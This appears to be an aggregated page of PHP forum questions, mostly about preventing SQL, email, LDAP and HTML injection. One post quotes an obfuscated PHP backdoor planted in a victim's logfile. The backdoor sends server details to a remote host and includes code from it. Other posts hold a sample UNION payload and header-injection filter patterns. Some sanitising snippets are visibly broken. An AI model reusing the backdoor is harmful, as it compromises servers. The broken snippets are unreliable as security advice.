PHP :: Common SQL Injection

PHP In Array Issue - Common Words
I have an array

$commonwords = array ("and", "he", "I", "in", "is", "it", "of", "that", "the", "to", "was","are", "as", "at", "be", "but", "for", "had", "have", "him","his", "not", "on", "one", "said", "so", "they", "we", "with", "you", "about", "an", "back", "been", "before", "big", "by", "call","came", "can", "come", "could", "did", "do", "down", "first", "from", "get", "go","has", "her", "here", "if", "into", "just", "like", "little", "look", "made", "make","more", "me", "much", "must", "my", "no", "new", "now", "off", "old", "only", "or","our", "other", "out", "over", "right", "she", "see", "some", "their", "them", "then","there", "this", "two", "up", "want", "well", "went", "were", "what", "when", "where","which", "who", "will", "your", "i", "&", "a", "good", "i'm");

Now I am trying to check if a perticuler search word containing any word which is in array.. so avoide them.. example:

if(!in_array($space_split['search_word'],$commonwords))
{
// some work
}

this is not giving me right result.. for example.. it is not avoiding some words like "a" "i'm" "&" and few others..

can anyone tell me what is this issue?

Common Login For Diff Modules
I need to make a community site containing blog, forum, shoutbox, gallery, news, event calenders. Any one can give me suggestions like how can i make them accessible with one common login? Is it already handled by joomla or any other cms?

Pre-caching Common Queries On A Database
In trying to improve the performance of searches on a database, I read that it makes sense to run a small set of common queries off-line and cache them in a plain HTML file, and then use HTTP Location: to point to the static page. Problem is the book I read only talks about CGI. Can anyhow tell me/point me in the right direction for doing a similar thing using PHP?

Common MySql Search Algorithms In PHP?
I need to put together a simple search function. I imagine there is
already some PHP code out there that handles the basics?

For instance, how do I search for just words, from one word boundry to
another?

Common Causes For Apache Exiting With SIGSEGV?
I have a website that's built with PHP and MySQL and it works just
fine, most of the time. However, when the load gets higher (say 3
hits per second), Apache starts to exit with SIGSEGV on almost every
request.

Are there any typical areas to look at to solve these kinds of
problem?

Sharing Common Files Between Sub-domains
I'm looking for some ideas and best practices for setting up my sub-domains to make sharing/including common files among different sub-domains easy.

Specifically, I am looking for a solution that will make it easy to reference common files in the PHP script as well as referencing common images within the HTML. This is particularly a problem when including files in a PHP script that may include other files - can't use relative pathing.

For example, let's say I had this folder structure:

mydomain.com
|
|--sub1.mydomain.com
|
|--sub2.mydomain.com
|
|--images
|
|--includes

I could create a $prepath varaible with the value ".." for the subdomains and "" for the main domain. Then use that to reference all files from the root of the main domain. Of course I would have to reference any images in the HTML with a full path from the main domain only.

Common Email Characters Not Accepted By Mysql
I'm making array of characters to replace with temporary proxys (equalsign, singlequote, doublequote, etc.) that will be switched back the original character when a user views his or her emails. For those of you who've done e-mail scripts with mysql before, which characters have proven to be the most trouble (I'm only imagining how many emails one email could hold up if checkmail.php's error array didn't have a certain charactter)?

Failed Opening Required 'common.inc'
I get this fatal error message when i try to include the 'common.inc' file. Could someone explain where common.inc and php.ini should be located and what their contents should be. I am running an apache server and php4. I found 3 different 'common.php' files in different locations within the php directory.

Reusing An Object For Common Select To Database
I've noticed that after I finished this app, I had repeated a similar task over and over and would like to modularize it. The repeated task was connecting to the database, executing a select, putting all the results of the columns into different variables of an object. PHP Code:

Forum Integrating Into The Common Web-site Interface
I am developing a dynamic site and I'd like to have the communication place for users of my web-site. For this goal I'd like to use phpBB, I like it. But I don't want to open this forum separately in another window or in the same with another design. I'd like to save the common web-site design (navigation menu on the left side of page, header and feuilleton).

List Of Common Words Mit My Keyword Search?
Seeing if anyone had a list of common words (the,a, as, of,...) so that I can limit my keyword search. I do not want to use the length of the word to limit.

How I Can Find Longest Common Prefix Of Strings
I'm interested in such algorithm that solves problem of finding longest
common prefix of two or more strings.

I haven't found such function in PHP, or I pass it?

Common Prob With Mysql LOAD DATA LOCAL INFILE ...
i have most recent php & mysql versions running on a linuxmachine

i want to use LOAD DATA LOCAL INFILE and pass it from php to mysql.

- the file i load is given with full path and the directory is readble
- On MySQL local-infile = ON
- From PHP i connect using client flag (128) to allow passing a file over
that connection: mysq_connect( $host, $usr, $pwd, false, 128)

Ive followed all advice from php & mysql sites and deja.com ...

But i still get the message: The command is not allowed with this MySql
Version or something ...

any ideas where i should look further?

what are *all* the requirements for a LOAD DATA LOCAL INFILE to work
seamingly?

SQL Injection
Can somenone explain to me what is SQL Injection??

PHP SQL Injection
there are several ways to prevent an SQL injection... but, is there a more efficient ways than this:

$formData=$_POST['formData'];
$formData=str_replace("'","'",$formData);
$formData=str_replace(""",""",$formData);
$formData=str_replace("<","<",$formData);
$formData=str_replace(">",">",$formData);
$formData=str_replace("$","$",$formData);

I'm looking for a shorter method than this. I want to block potential HTML, database, and server-side hacks.

SQL Injection
Just started on a new project which is based on a users only login interface. Last week i posted it on these forums for help on css on the login page. Then today i continue work on it and try to login and turns out my users table has been emptied!! Now the only reason i can think of for this happening is someone has done a sql injection attack on me and they must be a member or atleast a visitor of these forums because it is the only place i have posted the url and there is no way they could find it through a search engine!

Now all i want to know is how do i go about from stopping this from happening in the future as this is a big project and i cant afford to have a serious sercurity lapse like this!

Sql Injection
can anyone tell me abt sql injection. how can i be used in hacking a site?

SQL Injection
Using php how would i inject a whole .sql file filled with [CREATE tablename( data values and such) and INSERT INTO tablename] into a database using php code?

Sql Injection?
I searched google and got an answer, I just didnt understand very clearly, but someone help me understand what "SQL Injection" is?

SQL Injection Provention
I have built a site thats almost ready for release and i was reading up on SQL injection and it was something i had never thought about before...

Now i'm going through my scripts that use a DB and trying to add protection to them....

I'm basicly using a preg_match...

function checkSQL($str)
{
split and foreach...
if preg_match.....:
continue;
else:
print 'bad sql.....'
exit;
endif;
}

i know i need to keep a-z 0-9 - _...

What chars are used to perform a SQL Injection Attack?

Code Injection
I have a simple "Send an ecard" (my own flavour, as a way of learning php), and
someone's hacked in to a logfile, through my own silly mistake.

I'd just put a logfile (with the one-liner below) in to record anyone messing
with it. Yes, I should have used chmod 0600.

<?php header('Location: /'); exit; ?>

What they'd done is to insert their code between the php closing bracket.

<?php header('Location: /'); exit;
error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] :
$HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] :
$SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] :
$REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
$_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_en
code($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_dec
ode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){}
else
{include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZ
S5ydQ==")."/?".$str);}?>

Magic_quotes & Sql Injection
What are magic quotes, sql injection and what rae magic quotes used for,
I have many doubts regarding that can anyone clear them up for me,
Do magic quotes increase or decrease sql injection.

Preventing URL Injection
Does anyone have any tips on how to prevent SQL injection via URL or FORM data?

Does mysql_real_escape_string really help?

PHP/MySQL Injection
I'm a newbie in PHP and MySQL. Im wondering if there is a standard
combination of functions you should use on variabels psoted by a form
before u add them to a database. Something like:

$var = trim(addslashes($_POST['test']));

The Best Way To Protect SQL Injection?
I would like to ask if Regular expression is the best way to deal with
SQL injection attack, and no mysql_real_escape_string() is used:

if(preg_match("[A-Za-z0-9](4,6)")){
print "Success!";
}

In the above example, only character and digit are allowed. Other
injection technique is no used.

Is it correct? Did I make any foolish assumptions or mistakes?

Some Assistance With MS SQL Injection And PHP Please
Put simply we have recently been the victims of a malicious hacker
because we were not aware of the dangers of SQL injection. Now, I am
adding addition validation to my forms and also GET variables (we are
using PHP). Does anyone have any good techniques for the kind of
validation I should be using to avoid SQL injection? I basically want
to create a PHP function, fun any form variables through the function,
and then stop the script from executing if any bad input in found.
Thanks for all of your help. I don't want us to lose all of our data
again!

Another Form Of SQL Injection
In many web articles, people focusing on SQL injection in the form of :

e.g.
/************************************************** ********/
$name = "tom' UNION blah blah blah"
$query = "SELECT * FROM users WHERE name = '".$name."'
/************************************************** ********/

However, another form of SQL injection might in the form of...

/************************************************** ********/
$name = "1 UNION blah blah blah"
$query = "SELECT * FROM users WHERE id = ".$name;
/************************************************** ********/

for case 1, we can easily solved by escaping the special characters
like " ' ", but how to solve for case 2?

Mysql Injection
Does a MySQL injection attack only occur when the user is allowed to type something in which is used as part of a query?

What about forms where the user can only select from radio buttons/checkboxes/drop down lists.. They can't really do the multiple SQL thing can they?

SQL Injection And Magic_quotes_gpc
I've designed a simple form and scripted some PHP without any of the recommended security measures one normally employs to prevent SQL injection attacks. My aim in this was to experiment with SQL injection as I had never really understood it. Much to my chagrin, all of my injections seemed to have been escaped without my knowledge! I did some reading and found that a setting in my php.ini file escaped all of the input, magic_quotes_gpc.

Now, my question is this: Just how effective is magic_quotes_gpc at preventing SQL injection attacks? Given my limited knowledge of the field, I figured I'd ask the experts (every forum has at least two).

Form Injection
One of my clients' accounts has been suspended two days before because of a huge email traffic. Reports say that nearly 28000 emails have been sent through that domain. My client is unable to send that much emails, so it must have been some sort of spam effort. The first thing I thought are the forms on the website. There is a contactus form and a login form for member entry. On the contactus form, I thought I had taken some precaution using:

if(isset($_POST['postquote'])) {
$name = $_POST['name'];
$gender = $_POST['gender'];
$email = $_POST['email'];
$email = urldecode($email);
if (eregi("
",$email) || eregi("
",$email)){
$admin_to = "admin@mydomain.com";
$admin_subject = "Spammer Injection";
$admin_message = "Sir, spammer injection has been a failure, script died as you ordered!

Email Phrase is: $email";
$admin_from = "Spam Warrior Of My Domain";
mail($admin_to,$admin_subject,$admin_message,"From: $admin_from
");
die("Why ?? :(");
}
$phone = $_POST['phone'];
$fax = $_POST['fax'];
$quote = $_POST['quote'];
// code to send email
}
// contactus form
?>

Obviously that was not enough. I protected the email field, seems that it may be possible that the spammers use the other fields to send email. So, I have to protect other fields as well. How can I do this? Is there no escape from these spammers?

A Good Way To Deal With SQL Injection
I was trying to think up a nice, simple solution to SQL injection while
pondering my top ten vulnerability list. Here's something I came up with....

Quick Sql Injection Question.....
My book says prevent it like this:

$clean = array();
$mysql = array();

$clean['last_name']="o'reilly";
$mysql['last_name']=mysql_real_escape_string($clean['last_name']);

why are we using an array ( $mysql['last_name'] ) instead of just a
variable: $val?

Preventing SQL Injection Attacks
Can anyone provide any suggestions/URLs for best-practice approaches to
preventing SQL injection? There seems to be little on the web that I can
find on this.

Email Injection Query
Up to the other day I have not bothered protecting my php script on my
feedback form against email injection. Howerver, i have had a spammer using
it to insert email addresses as cc: bc: into my email field. First I was
puzzled why he was doing it as the message being sent was just jibberish. I
have recently used a function to protect these fields and send an email back
to myself with his details. function below

function spamcheck($spammed_field,$returnpage) {
$spammed_field=strtolower($spammed_field);
if((eregi("cc:",$spammed_field))||(eregi("subject:",$spammed_field))) {
//(eregi("bcc:",$spammed_field))||
$spamhost=$_SERVER['REMOTE_HOST'];
$spamrefr=$_SERVER['HTTP_REFERER'];
$spamaddr=$_SERVER['HTTP_X_FORWARDED_FOR'];
if(strlen($spamaddr)<7) { $spamaddr=$_SERVER['HTTP_CLIENT_IP']; }
if(strlen($spamaddr)<7) { $spamaddr=$_SERVER['REMOTE_ADDR']; }
$thisfile=$_SERVER['SCRIPT_NAME'];
$spamtext="FILE: $thisfile
FROM: $spamrefr
ADDR: $spamaddr
HOST:
$spamhost
INFO:
$spammed_field
";
mail("spamcheck@mysite.co.uk","ALERT: $spamaddr",$spamtext,"From: IDD
Software Spamcatcher <spamcheck@mysite.co.uk>
");
//echo();
die("<br><br><div align='center' class='RedWarning'>If you are a spammer
trying to inject script into my input fields, then go away and get a
life<br>otherwise<br>Please try again as you may have included some
incorrect characters.<br><br><a href='".$returnpage."'
class='BodyLink'>Return</a></div>");
}
}

This function should cause the attempt to spam to die and send info about
the spammer and he injected script to me which it does brillantly. But now
Im getting more of these notices of spamming than I was getting originally
spammed messages with many more emails in the cc: bcc: and a proper message
(just sales stuff about tea oil). Why is he still attempting this if the
spam is not working and being sent to the recipients. I have an appropriate
message displayed when the spam is attempted. Is he stupid and just sitting
there trying to spam my feedback form even though he is getting this message
telling him to go away, or is do you think there is some sort of automatic
process being run on my webpage?

Is there a way to return an email to him everytime its attempted?
The function returns his address eg ADDR: 203.198.162.124. but it changes
everytime. I dont know much about the antics and abilities of spammers (but
learning).

Protecting Against Ldap Injection?
Say I have the following in a PHP script of mine:

$sr=ldap_search($ds, "", "(& (sn=$_GET[lastname]) (givenName=
$_GET[firstname]*))");

If $_GET[lastname] contains a ), an attacker could escape out of the
first part of the LDAP query and perform ldap injection, as it were
(not sure what can be done with ldap injection, though).

My question is... how do I prevent this? Would I escape ) with )?
Would there be other characters I'd need to escape, as well?

Mail() Injection, Am I Safe?
I was looking at mail injection,
http://securephp.damonkohler.com/in...Email_Injection

And I was wondering if my mail(...) was safe.

I ask in a form for
1 Name
2 Email address
3 Subject
4 Comment/Message

I then build one message by putting all of the above together.
So even if there was injection, it is all in the body of my message, right?

I then use mail(...) as per normal with my hard coded "To:" and "Subject:"

Is that a fairly safe way?

How should I parse my form to prevent malicious code, (Script? eval?)

How To Prevent Html Injection
i store database from the text box and i show it the database value to my page.

how to prevent if user input html text into textbox and when before i want to store the value from textbox to database, it will check is the input is html or not. so when i show database value to my page the html script not print.

example like this :

<a href src="http://www.google.com">google[/url]

when i submit this topic this will show as text not a link

Php Exploit, Bug, Sql Injection Tester
Anyone know a software or something else to test your webpage for exploit and stuff? So its "kinda" secure ? I see people in the Beta test center comming with all those bugs from websites, do they test them by hand or with some software ?

How To Use An SQL INJECTION Detection Script
I've found this php class for detecting and dealing with sql injection, i'd love to use it, but the instructions in the class are a bit complicated (for me), could someone show me an example of how to use it and which function to use, there are many in the class. Code:

Solution For Preventing Injection Attacks
I have an idea for preventing sql injection attacks, however it would
have to be implemented by the database vendor. Let me know if I am on
the right track, this totally off base, or already implemented
somewhere...

Lets say you could have a format string such as in printf

$format=" SELECT %s FROM %s WHERE id='%s' ";
$fieldname="last_name";
$tablename="personel";
$id="425";

and you could execute a query like

mysql_query_formatted($format, $fieldname, $tablename, $id);

now, the key is that instead of just adding the $fieldname, $tablename,
$id to the $format string and passing it to mysql_query, it would be
passed to the parser as separate strings. The parser should know how
to handle that format. That way, the parser would always know where
the different tables names, field names, and other strings start and
end. So, the problem of injection attacks caused by some one confusing
the parser by entering things like ' and " is gone.

It would be easier on the programmer. There would be no need to worry
about escape characters when passing to this function, the strings
would not have to be escaped.. The parser would no longer have to
guess where the boundaries are. No more worrying about injection
attacks.

does that make sense?

Email Injection On A Contact Form
One problem that I had been having is stopping email injections on
contact forms. I did some research, read up on it and felt like I had
created a working solution. I hadn't gotten any suspicious bouncebacks
in quite some time and got many custom alerts I had set up for
notifying me of injection attempts. However, just the other day, I got
a bounceback from an AOL address which leads me to believe that an
injection attempt was successful. I was hoping that someone here could
help me out.

Here is the code that I am using to check for injections:

function containsInjectionAttempt($input) {
if (eregi("
", $input) ||
eregi("
", $input) ||
eregi("%0a", $input) ||
eregi("%0d", $input) ||
eregi("Content-Type:", $input) ||
eregi("bcc:", $input) ||
eregi("to:", $input) ||
eregi("cc:", $input)) {
return true;
} // end of if
else {
return false;
} // end of else
} // end of containsInjectionAttempt function

// Check for injection attempts
if (containsInjectionAttempt($_POST['userName']) ||
containsInjectionAttempt($_POST['address']) ||
containsInjectionAttempt($_POST['address2'])
|| containsInjectionAttempt($_POST['city']) ||
containsInjectionAttempt($_POST['zip']) ||
containsInjectionAttempt($_POST['phone'])
|| containsInjectionAttempt($_POST['email'])) {
// There has been an injection attempt
while (list($key, $value) = each($_POST)) {
$message .= $key.": ".$value."
";
} // end of while
mail ("me@test.com", "Injection attempt on Web Site", $message,
"From: info@website.com");
$mailSuccess = 1;
} // end of if

Then, if the mailSuccess variable is set to 1, it sends out the email.
There is also a comments textarea that I do not run through the
injection check. It is my (possibly incorrect?) understanding that
anything going into the message body does not need to be checked for an
injection attempt since it should not be able to affect the headers. A
problem with checking a textarea against the injection check would be
that it would mark most legitimate messages as injections since it
looks for.

Automatic Mysql Injection Protection
Is there a way to automatically do this? I don't want to apply mysql_real_escape_string to every query.

How To Prevent MySQL Injection Attacks?
I've fully read

http://us.php.net/manual/en/function.mysql-real-escape-string.php

and I'm still confused. Everyone has their own "best practice" code and they're all different. I've done extensive googling and it's the same. This is a huge headache as everyone is acting like an authority..

This is what I'm planning to do for my script. Please let me know of any shortcomings.

1) [Example 1442 in link] - add mysql_real_escape_string to ALL MySQL queries. Would this be enough? It would seem this would catch anything.
2) $id = intval($_GET['id']) instead of a simple $_GET['id']. Would this be necessary if I do the previous prevention method (1) and is there some code that be used if the variable passed is a string?

Am I Covering My Bases Against MYSQL Injection?
I've got a html page that takes in parameters from the address and passes them to a PHP script which accesses a MYSQL database. I'm only allowing alphanumeric characters with the exception of these symbols:
?
&
=
%
/
-
.
:

The scrubbing script I use is this:
$str = preg_replace('/[^a-zA-Z0-9?&=%-.:/ ]/i', '', $str);

Also, there are some variables that are numbers, so I run this following script to make sure it's numeric:
return (preg_match ("/^(-){0,1}([0-9]+)(,[0-9][0-9][0-9])*([.][0-9]){0,1}([0-9]*)$/", $value) == 1);

Is there anything else I need to worry about?

Common SQL Injection

What are common SQL injection methods that are used? I would like to test my site against them. Login Set Up Email: [input box] Pass: [input box] [submit button]